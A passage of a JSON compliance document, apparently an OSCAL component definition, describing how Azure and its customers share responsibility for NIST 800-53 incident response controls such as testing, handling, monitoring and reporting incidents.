During the post-exercise phase, lessons learned are discussed and incident management policies and procedures are updated accordingly.\n\nAfter the exercises, a post-exercise summary is documented. The post-exercise summary documents the incident ticket number which details how Azure determined there was an incident all the way through the resolution of the incident. Each incident entry is documented in an incident tracking system including identifying the personnel that made updates to the ticket.\n\nThe Security Response Team regularly evaluates response methodology and tools to ensure optimal performance during incidents in Azure as part of the Post incident management (PIR) process."}],"responsibilities":[{"uuid":"d23b6b9f-564e-437c-9a3d-5abfd5408a51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-010"}],"description":"The customer is responsible for testing the incident response capability of customer-deployed resources.","provided-uuid":"221d8114-146e-4af0-8bc2-08b7580513a7"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7d755bbd-7e75-482f-9470-1965b0495b10","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-3.2","statements":[{"uuid":"ed1bf364-84ad-4cfa-88f5-1ccd9e0c7e07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-3.2_smt","by-components":[{"uuid":"440685ff-0930-4c2d-94e6-743a9262eb30","export":{"provided":[{"uuid":"d980bdc4-3cda-4fb4-b74e-71b6777d5de8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-011"}],"description":"The Azure Security Response Team coordinates incident handling activities with contingency planning activities managed by the Business Continuity Management (BCM) team. If incidents or incident management tests trigger Business Continuity and Disaster Recovery (BCDR) plan activation criteria, contingency plans are followed in coordination with the Incident Management SOP._x000D_ _x000D_ Incident response testing activities are also coordinated with service teams through table top and Azure Red Team exercises. These exercises are intended to replicate a real incident and identify weaknesses in the existing incident response processes. 
If incidents or incident response tests trigger contingency plan activation criteria, contingency plans are followed in coordination with the Incident Management SOP."}],"responsibilities":[{"uuid":"19d2da75-eac6-4c31-b7ba-01fbaeb9bd38","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-011"}],"description":"The customer is responsible for coordinating incident response testing with related plans (e.g., business continuity, contingency, disaster recovery).","provided-uuid":"d980bdc4-3cda-4fb4-b74e-71b6777d5de8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b7ba9059-4a3d-4b56-a863-c8a5a55b3739","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4","statements":[{"uuid":"32543dff-22e8-4440-a1f6-2ab9ac848407","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4_smt.a","by-components":[{"uuid":"f1d4bfc0-c56d-4f7a-bbd2-2e73ba70da84","export":{"provided":[{"uuid":"bf917f60-e65c-4491-8418-b0bdb69364ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-012"}],"description":"Azure implements a standardized incident handling framework derived from multiple incident handling methodologies including NIST Special Publication 800-61 Revision 2, ISO/IEC 27035:2011, and the SANS Institute publication Computer Security Incident Handling. 
The Azure C+AI Incident Management process includes multiple stages throughout the resolution of an incident. Incidents may be managed with the Crisis Management or Security Customer Reportable Security or Privacy Incident sub-processes of the overarching Incident Management process. When incidents become triaged as a high severity event (Severity 1 or higher, Severity 0 being the highest) they are managed with the Customer Reportable Security or Privacy Incident sub-process. The process includes steps for preparation, detection and analysis, containment, eradication, and recovery and post-incident activity. Full investigations are conducted by the Security Response Team investigators and are overseen by a Security Incident Manager; this is accomplished through the forensic retrieval of data from affected assets and/or retrieval of relevant event data. Azure ensures individuals that are part of the Security Response Team meet personnel security requirements commensurate with the criticality and sensitivity of the information being processed, stored, and transmitted in Azure. Azure actively plans and implements sustainable security incident management capabilities. Incident management activities are reviewed regularly and improvements for infrastructure protection are identified to improve incident management capabilities. 
Additionally, Azure reports confirmed security and availability incidents to DoD, US-CERT and affected customers in accordance with applicable policies and procedures."}],"responsibilities":[{"uuid":"5eac72b8-9340-4a9c-b21d-2a68cd3c6abc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-012"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for implementing key incident handling capabilities including preparation, detection and analysis, containment, eradication, and recovery. In addition, incident handling for customer applications is the responsibility of the government agency unless caused by Microsoft or an incident is the result of Microsoft action. The government agency is responsible for providing a point of contact and escalation plan so that Microsoft keeps government staff informed during an incident response.","provided-uuid":"bf917f60-e65c-4491-8418-b0bdb69364ba"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c0e1d562-2a7b-43f6-8ace-e3b81150ab91","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4_smt.b","by-components":[{"uuid":"5b967089-3dbe-4a6e-b2fd-6731fb29eaf6","export":{"provided":[{"uuid":"e69ec0fc-9863-4b26-9db8-f9656a48fd63","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-013"}],"description":"During the incident management assessment stage and throughout the incident handling process, the Security Response Team evaluates the incident's severity and works with the affected 
service teams to initiate the appropriate Azure Business Continuity Plan (BCP) or Azure Disaster Recovery Plan (DRP). As part of the Enterprise Business Continuity Management (EBCM) process followed by the service teams, the contacts for required incident management processes are included for business continuity and disaster recovery (BCDR). For planned BCDR activities, service teams use Incident Management (IcM) to track the activity. If related to an unplanned incident, the service teams use IcM to track the incident to closure."}],"responsibilities":[{"uuid":"73dfa7a8-015e-4fb5-a55c-46d710d2a9b0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-013"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for coordinating incident handling activities with contingency planning activities for customer-deployed resources.","provided-uuid":"e69ec0fc-9863-4b26-9db8-f9656a48fd63"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"45c0321f-12d1-4818-95ce-46207255ce27","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4_smt.c","by-components":[{"uuid":"7631383d-491b-4aaf-9643-31c03b58d0db","export":{"provided":[{"uuid":"238e3b56-bb2c-4989-b346-1eabde3527f6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-014"}],"description":"As part of IcM, when an incident is resolved, service teams must provide a resolution. 
When the incident is addressed, the service team with the incident ticket assigned to them resolves the incident and provides the mitigation steps taken to resolve the incident. Service teams can also provide root cause information for optionally correlating the incidents within IcM. For all Severity 0, 1, or 2 incidents, a Post Incident Response (PIR) review is completed by the Security Response Team to determine root cause details and compile a report containing all lessons learned from the incident. The goals of these reviews are to:\n* Identify technical or communications lapses, procedural failures, manual errors, and process flaws that might have caused the Availability Incident or that were identified with a formal PIR\n* Ensure technical lapses are captured and can be followed up with engineering teams in the form of bugs in their operational databases\n* Evaluate response procedures for sufficiency and completeness of operating procedures.\n\nAdditionally, the Incident Manager is accountable for maintaining an inventory of all repair items, their owners, and completion dates. The PIR should contain the following:\n* Customer/Business Impact\n* Incident Severity\n* Root Cause Description\n* Repair items\n\nThe concepts derived from the lessons learned, as mentioned above, are consistently incorporated into Microsoft Azure Incident Response training and testing procedures. This is achieved through continuous on-the-job shadow training and annual Strike, Security & Privacy Foundations Training. 
The ongoing on-the-job shadow training, which involves learning from real incidents, coupled with our annual Strike, Security & Privacy Foundations Training, is meticulously designed to fulfill the intent of the control."}],"responsibilities":[{"uuid":"f58608ea-83ea-4be7-b3b1-71c21d547431","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-014"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for implementing incident handling capabilities that include lessons learned from ongoing incident handling activities; their incorporation into incident response procedures, training, and testing and the implementation of the resulting changes.","provided-uuid":"238e3b56-bb2c-4989-b346-1eabde3527f6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"96ea8e1c-906f-461c-977d-c80cee446db9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4_smt.d","by-components":[{"uuid":"06d80daf-a3a5-405b-a86c-faebd699401f","export":{"provided":[{"uuid":"13efed2c-f58d-471e-98fd-63f3897acdba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-015"}],"description":"The Security Response Team tracks all incidents affecting Azure; collects data about each incident as well as Post Incident Reports; and analyzes the gathered data to enhance the understanding of incident awareness and response across Azure. 
The team performs monthly metric reviews and weekly post-mortems, which correlate incident information and individual incident management activities. The monthly metrics provide a better understanding and perspective of the threats against applications, people, and assets. The Azure Incident Management Standard Operating Procedure (SOP) describes the incident handling process for all incidents, including incidents generated by insider threats. Azure Security may engage the Microsoft personnel investigations team to provide support and guidance on forensic investigations when the scope of investigation includes personnel working at Microsoft. Once an incident is identified as suspected insider threat, the Security Incident Manager notifies the Office of Legal Compliance (OLC)."}],"responsibilities":[{"uuid":"8fa5907a-297f-4a37-89f5-4931f9f175f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-015"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for ensuring the rigor, intensity, scope, and results of incident handling activities are comparable and predictable across the organization.","provided-uuid":"13efed2c-f58d-471e-98fd-63f3897acdba"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"db8f7ea7-205a-46ee-88d4-0892bd969a9a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4.1","statements":[{"uuid":"0df4c62e-6e28-4a06-a206-f49691839147","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-016"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4.1_smt","by-components":[{"uuid":"75bd5b44-443c-4643-a5dd-fba55bf1d997","export":{"provided":[{"uuid":"3d1318bf-c75f-41d1-ad84-98e9cc2f85ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-016"}],"description":"Azure employs automated mechanisms, including, but not limited to, service team-specific SharePoint and Microsoft Teams sites, Incident Management (IcM), and Service Now (SNow), the security ticket management system, to support the incident handling process such as alerts, notifications, error messages, or other automated warnings through the audit and accountability processes. Upon identification of an incident, service teams create IcM tickets for tracking purposes. The team primarily responsible for resolution takes ownership of the IcM ticket and may create a ticket in Azure DevOps for secondary tracking. These are technical solutions that are available to personnel twenty-four (24) hours a day, seven (7) days a week. 
Due to the sensitive nature of security incidents, a separate ticketing system, SNow, is employed by the Security Response Team to track and manage security cases. SNow is used in addition to IcM and other tools to provide least privilege and need-to-know implementations. If the incident is security related, the service team may transfer ownership of the IcM ticket, use the \"Request Assistance\" feature, or report via email to the Security Response Team twenty-four (24) hours a day, seven (7) days a week."}],"responsibilities":[{"uuid":"c48a450e-b655-4c66-a345-606d146201be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-016"}],"description":"The customer is responsible for employing automated incident handling mechanisms (e.g., ticketing systems and incident tracking/reporting systems).","provided-uuid":"3d1318bf-c75f-41d1-ad84-98e9cc2f85ff"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"070a7a14-bfc3-4f1a-b1bf-616da174257a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4.2","statements":[{"uuid":"354064e2-0aac-43df-940e-884429200c5e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4.2_smt","by-components":[{"uuid":"e59635ec-1e8f-45e5-8a8c-d3fb594383fc","export":{"provided":[{"uuid":"67fdcd7a-7b06-416c-8d48-8eab70d64190","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"ac
f-id","value":"IR-08-017"}],"description":"Azure personnel are able to access network, data storage, and computing devices within the system and change their configuration as required during the incident management process, up to and including updating firewall rules, restricting network access, removing users, and more. The Security Response Team maintains the capability to dynamically reconfigure information system components as outlined in the Rapid Containment Protocol section of the C+AI Security Playbooks. Capabilities include the ability to disable accounts, change ACLs and quarantine assets if determined necessary in an incident management scenario."}],"responsibilities":[{"uuid":"8e2e17d2-eccc-4086-ae28-e3de3b7ad3c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-017"}],"description":"The customer is responsible for including dynamic reconfiguration of all customer-deployed resources as part of the incident response capability (e.g., filter rules to firewalls and gateways, access control lists).","provided-uuid":"67fdcd7a-7b06-416c-8d48-8eab70d64190"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5a1559cc-71f6-4c74-92cd-aae85860176a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4.4","statements":[{"uuid":"eba79aa7-ce04-48c7-b946-d2b51ae7f1ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-018"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4.4_smt","by-components":[{"uuid":"03ceec7f-4366-4f72-bcc4-c23b82d39162","export":{"provided":[{"uuid":"b637d90c-0eab-437c-bcda-12f56f1af52d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-018"}],"description":"The Security Response Team tracks all incidents affecting Azure; collects data about each incident as well as Post Incident Reports; and analyzes the gathered data to enhance the understanding of incident awareness and response across Azure. The team performs monthly metric reviews and weekly post-mortems which correlate incident information and individual incident management activities. 
The monthly metrics provide a better understanding and perspective of the threats against applications, people, and assets."}],"responsibilities":[{"uuid":"bd2c98d6-7f02-4876-af50-b69d076a0cbb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-018"}],"description":"The customer is responsible for correlating incident information and individual incident responses across the customer organization to achieve perspective on incident awareness and response.","provided-uuid":"b637d90c-0eab-437c-bcda-12f56f1af52d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"058e4299-893e-4571-8846-a44ea7d6fd46","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4.6","statements":[{"uuid":"7ffb91e8-a583-4d79-ab9f-0a8b815927d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4.6_smt","by-components":[{"uuid":"106b2f80-1670-47b2-a83d-3cd4992ee13f","export":{"provided":[{"uuid":"3f6e368e-7358-451f-903c-ffeaf0019f36","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-019"}],"description":"The Incident Management SOP describes the incident handling process for all incidents, including incidents generated by insider threats. 
Azure Security may engage the Microsoft personnel investigations team to provide support and guidance on forensic investigations when the scope of investigation includes personnel working at Microsoft. Once an incident is identified as a suspected insider threat, the Security Incident Manager notifies the Office of Legal Compliance (OLC). Additionally, Azure Security may engage the Microsoft Corporate Security team to provide support and guidance on forensic investigations when the scope of investigation includes personnel working at Microsoft, including CorpNet information."}],"responsibilities":[{"uuid":"0c7585a1-1527-41ae-a382-690438677f79","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-019"}],"description":"The customer is responsible for implementing an incident handling capability for insider threats.","provided-uuid":"3f6e368e-7358-451f-903c-ffeaf0019f36"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"37dcb37f-12fc-4214-9550-ecb6445b556b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4.11","statements":[{"uuid":"9bdcc637-683e-45aa-99c4-a74d8c9384b3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4.11_smt","by-components":[{"uuid":"0c88178a-95f8-4692-a4ea-dd9cc4b62440","export":{"provided":[{"uuid":"2a2c3d91-4b51-4a37-8f4a-f5912b8777f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-020"}],"description":"The Azure Security Response Team, consisting of Microsoft Issues & Crisis Management, Security CELA, the C+AI Compliance Team, the National Security Team, and the Security Response Team, includes access to forensic/malicious code analysts, tool developers, and operators either directly or within Microsoft to share information and leverage the knowledge of various functions to rapidly respond to incidents in near real time. 
Azure locations generally include members of the Security Response Team, but given the interconnected nature of the hyperscale Azure cloud, physical access is rarely required for incident response."}],"responsibilities":[{"uuid":"6aa1835d-0f1f-46bd-902a-7be5232c1f16","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-020"}],"description":"The customer is responsible for establishing and maintaining an integrated incident response team that can be deployed to any location identified by the organization in near real-time.","provided-uuid":"2a2c3d91-4b51-4a37-8f4a-f5912b8777f2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e333777c-a6cc-4329-8025-787a1a02e721","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-5","statements":[{"uuid":"2728e4b9-5bbc-4b6a-8181-cda727adc4e8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-5_smt","by-components":[{"uuid":"51addff7-29a1-4e56-a1b7-8400e959a086","export":{"provided":[{"uuid":"5a890dd7-8a54-4e1b-b38d-804498362ad1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-021"}],"description":"The Azure Security Response Team utilizes the Incident Management (IcM) ticketing system for notification about new alerts. Certain Azure monitoring tools such as Azure Security Monitoring (ASM) create tickets automatically when monitoring for security events. 
These tickets can be assigned to the Security Response Team as necessary. In other cases, tickets are created as a result of manual log review, incident reporting from service teams, or incident management team research and investigation. Should an IcM alert pass the triage phase without being determined to be a false positive, the Security Response Team creates a case in Service Now (SNow), the security incident tracking tool. Case tickets are updated as more information on the incident is gathered. While not preferred, the Azure Security Response Team monitors a dedicated phone and email alias twenty-four (24) hours a day, seven (7) days a week which can also be used to report suspected security issues. Tickets for events are entered into IcM and SNow and escalated as necessary. This escalation process enables incidents to be escalated to the proper teams. At any point in the escalation path, once the incident has been resolved, the responding support group updates the status of the incident. 
If it is a customer-related incident, the owner of the incident communicates the resolution of the issue to the customer."}],"responsibilities":[{"uuid":"9213e35f-16e5-4f7e-a3f6-8cfbc8e8c806","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-021"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for tracking and documenting incidents of customer-deployed resources.","provided-uuid":"5a890dd7-8a54-4e1b-b38d-804498362ad1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7539369b-542a-4668-9925-91c7c5ae6d83","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-5.1","statements":[{"uuid":"57faacda-e3f2-49f0-adec-535dc742882f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-5.1_smt","by-components":[{"uuid":"d600f690-264c-47f6-a6c0-3d4fe0b6dddc","export":{"provided":[{"uuid":"d60b058f-1776-4d6a-bd95-f80f0bf9f06b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-022"}],"description":"Incident Management (IcM) collects alerts which are then sent to incident management personnel as needed, who then generate a ticket in Service Now (SNow) to track the incident to resolution.
"}],"responsibilities":[{"uuid":"09110330-daa8-45ae-ac94-1d83cd102628","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-022"}],"description":"The customer is responsible for employing automated mechanisms to assist in incident monitoring to support tracking security incidents and collecting/analyzing incident information.","provided-uuid":"d60b058f-1776-4d6a-bd95-f80f0bf9f06b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"57da4b12-d974-4ce6-96c0-e011a51c0280","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-6","statements":[{"uuid":"c169a3f0-3032-41cb-91ee-f4ef66cb701f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-6_smt.a","by-components":[{"uuid":"42174e9e-23b6-45cc-bbd3-f41ba28a4785","export":{"provided":[{"uuid":"f0081f6f-50b4-405a-ba25-73a17471e571","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-023"}],"description":"All Microsoft personnel are required to immediately report events when they believe that a security incident has occurred. Examples of such events include, but are not limited to: * Alerts, notifications, error messages, or other automated warnings that indicate a security incident may have occurred. * Reports of security incidents received from external parties, including customers, members of the press, or the general public. 
* Personal observations of anomalies or unexpected events that might indicate a security incident has occurred. * Indication of virus, malicious software or hacker activity. Personnel can report incidents by manually entering event related data directly into the incident management ticketing system which is classified in accordance with NIST Special Publication 800-61 Revision 2 standards based on the Classification, Escalation, and Notification (CEN) Matrix and escalated or by sending email to cdoc@microsoft.com. Tickets are routed automatically to the Security Response Team. Any incident that involves the breach of personal information (PII or above) also requires a notification to the Security team at alias cdoc@microsoft.com. Security then loops in the dedicated Privacy team if needed. Incidents that involve the exposure of information covered by the Microsoft Privacy Policy necessitate the involvement of the Privacy team."}],"responsibilities":[{"uuid":"dee80a94-c1f3-4f4b-a939-fac10a611fb5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-023"}],"description":"The customer is responsible for requiring personnel to report suspected security incidents to the organizational incident management capability within the required time period.","provided-uuid":"f0081f6f-50b4-405a-ba25-73a17471e571"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"62a7e560-c7af-41f4-bba0-0ef3c5b86a83","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-6_smt.b","by-components":[{"uuid":"ce710e1e-580e-499a-8862-629e065078cc","export":{"provided":[{"uuid":"6641e48a-b395-4864-88c1-06384b152b0e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-024"}],"description":"The Azure Security team coordinates with the ISSO to notify the appropriate contacts including, as appropriate, authorizing officials, customers, and others, of an incident, incident updates, and resolution. Azure reports events per the timelines and process documented in the Azure Incident Management Standard Operating Procedure (SOP). The Azure Incident Management Standard Operating Procedure (SOP) identifies the types of security incidents that should be reported to the regulator or regulators, reporting timeframes, and specific processes for reporting and handling incidents involving customer data. Customers receive notification of security incidents involving the confirmed breach of their customer data via means Microsoft deems most appropriate. 
This is via email sent to the administrators and co-administrators of an impacted subscription or through updates to the Service Health Dashboard, or the customer's Azure Management Portal within the time periods defined in the Azure Incident Management Standard Operating Procedure (SOP)."}],"responsibilities":[{"uuid":"06de8a91-e6cd-47f0-afe2-f911180ec453","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-024"}],"description":"The customer is responsible for reporting security incident information. Per contractual agreement, it is the customer's responsibility to provide accurate and current contact information to Microsoft Azure in order to receive notifications of security incidents involving the potential breach of customer data. The customer is also responsible for designating US-CERT as a notification contact. It is the responsibility of the government customer agencies to inform Microsoft of the individuals, teams, and email addresses to be notified and kept updated for the incident handling process. Upon a confirmed security incident, Azure Security Response will notify the Administrators and Co-Administrators of a subscription. It is the responsibility of the government customer agencies to notify US-CERT if a breach occurs entirely within the customer's scope of responsibility (e.g. 
